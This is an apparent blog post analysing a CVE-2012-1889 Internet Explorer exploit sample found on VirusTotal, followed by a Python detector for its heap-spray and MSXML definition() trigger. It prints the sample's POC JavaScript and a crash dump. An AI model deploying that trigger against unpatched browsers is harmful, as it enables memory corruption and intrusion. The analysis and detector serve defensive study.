Tag archive » CVE-2012-1889

CVE-2012-1889 exploit sample analysis

Hi, this is an IE exploit sample. I found it on VirusTotal: https://www.virustotal.com/en/file/1df80150284800e82b1dd64579aae71ebce2f6fd44ea37e4c83af287502452ee/analysis/

But I see the detection ratio is very low, 12 / 51; many vendors cannot detect this sample. From the VT tag it seems to be CVE-2012-1889, which really is an old vulnerability. We can also find the exploit code here: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb

Now let's look through this sample. The POC code is as follows:

```html
<script type="text/javascript">// <![CDATA[
var obj=document.getElementById('puZz').object;
var src=unescape("%"+"u0c08"+"%"+"u0c0c");
while(src.length<0x1002)src+=src;
src="\\\\xxx"+src;
src=src.substr(0,0x1000-10);
var pic=document.createElement("img");
pic.src=src;
pic.nameProp;
obj['definition'](1000);
// ]]></script>
```

Now we load the POC in IE. It crashes:

```
(90c.76c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c08 ebx=00000000 ecx=5dda5dfc …..
```
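Two things in that POC are worth flagging statically when triaging samples like this one: the string that is doubled into a heap spray, built from split literals ("%"+"u0c08") so that a naive search for "%u" misses it, and the call to the MSXML `definition` method. The following Python is an added example written for this post; it is not code from the sample, the post, or the Metasploit module. It assumes only that the script body has already been pulled out of the HTML. `SAMPLE_SCRIPT` is constructed from the POC lines above. The checker folds the split literals, decodes `unescape()` sequences into the little-endian bytes they occupy in memory, recovers the 32-bit word the spray lays down (0x0c0c0c08, the value seen in `eax` at the crash), and checks for the doubling loop and the `definition()` call.

```python
import re

# Constructed sample (assumption: script text already extracted from the page),
# keeping the "%"+"u0c08" literal-splitting seen in the POC.
SAMPLE_SCRIPT = '''
var obj=document.getElementById('puZz').object;
var src=unescape("%"+"u0c08"+"%"+"u0c0c");
while(src.length<0x1002)src+=src;
obj['definition'](1000);
'''

# unescape(<argument expression>)
UNESCAPE_CALL = re.compile(r'unescape\s*\(([^)]*)\)')
# while(x.length<0x....)x+=x  -- the self-doubling spray loop
SPRAY_LOOP = re.compile(
    r'while\s*\(\s*(\w+)\.length\s*<\s*0x[0-9a-fA-F]+\s*\)\s*\1\s*\+=\s*\1')
# obj['definition'](...) or obj.definition(...)
DEFINITION_CALL = re.compile(r'''(\[\s*['"]definition['"]\s*\]|\.definition)\s*\(''')


def fold_literals(expr):
    """Concatenate every quoted literal in a JS expression, so that
    "%"+"u0c08"+"%"+"u0c0c" folds to %u0c08%u0c0c."""
    return "".join(a or b for a, b in re.findall(r'"([^"]*)"|\'([^\']*)\'', expr))


def decode_unescape(s):
    """Decode %uXXXX and %XX the way JS unescape() does and lay each UTF-16
    code unit out little-endian, the byte order it occupies in memory.
    Characters outside the BMP are not handled (sufficient for spray strings)."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s.startswith("%u", i) and i + 6 <= len(s):
            out += int(s[i + 2:i + 6], 16).to_bytes(2, "little")
            i += 6
        elif s[i] == "%" and i + 3 <= len(s):
            out += int(s[i + 1:i + 3], 16).to_bytes(2, "little")
            i += 3
        else:
            out += ord(s[i]).to_bytes(2, "little")
            i += 1
    return bytes(out)


def spray_words(data):
    """Return the distinct 32-bit words a repeated pattern writes, or an empty
    set when the decoded payload is not a whole number of words."""
    if not data or len(data) % 4:
        return set()
    return {int.from_bytes(data[i:i + 4], "little") for i in range(0, len(data), 4)}


def analyse(script):
    """Static triage of one script body: the spray words found in unescape()
    arguments, whether a doubling loop and a definition() call appear, and a
    verdict that requires all three."""
    words = set()
    for arg in UNESCAPE_CALL.findall(script):
        words |= spray_words(decode_unescape(fold_literals(arg)))
    spray_loop = SPRAY_LOOP.search(script) is not None
    definition = DEFINITION_CALL.search(script) is not None
    return {
        "spray_words": sorted(hex(w) for w in words),
        "spray_loop": spray_loop,
        "definition_call": definition,
        "suspicious": bool(words) and spray_loop and definition,
    }


if __name__ == "__main__":
    print(analyse(SAMPLE_SCRIPT))
```

The verdict deliberately requires all three indicators together: a repeated address-like word alone also appears in benign obfuscated scripts, and the `definition` call alone is just an MSXML API use. Run on the constructed sample, `spray_words` comes back as `['0xc0c0c08']`, matching the `eax` value in the crash dump.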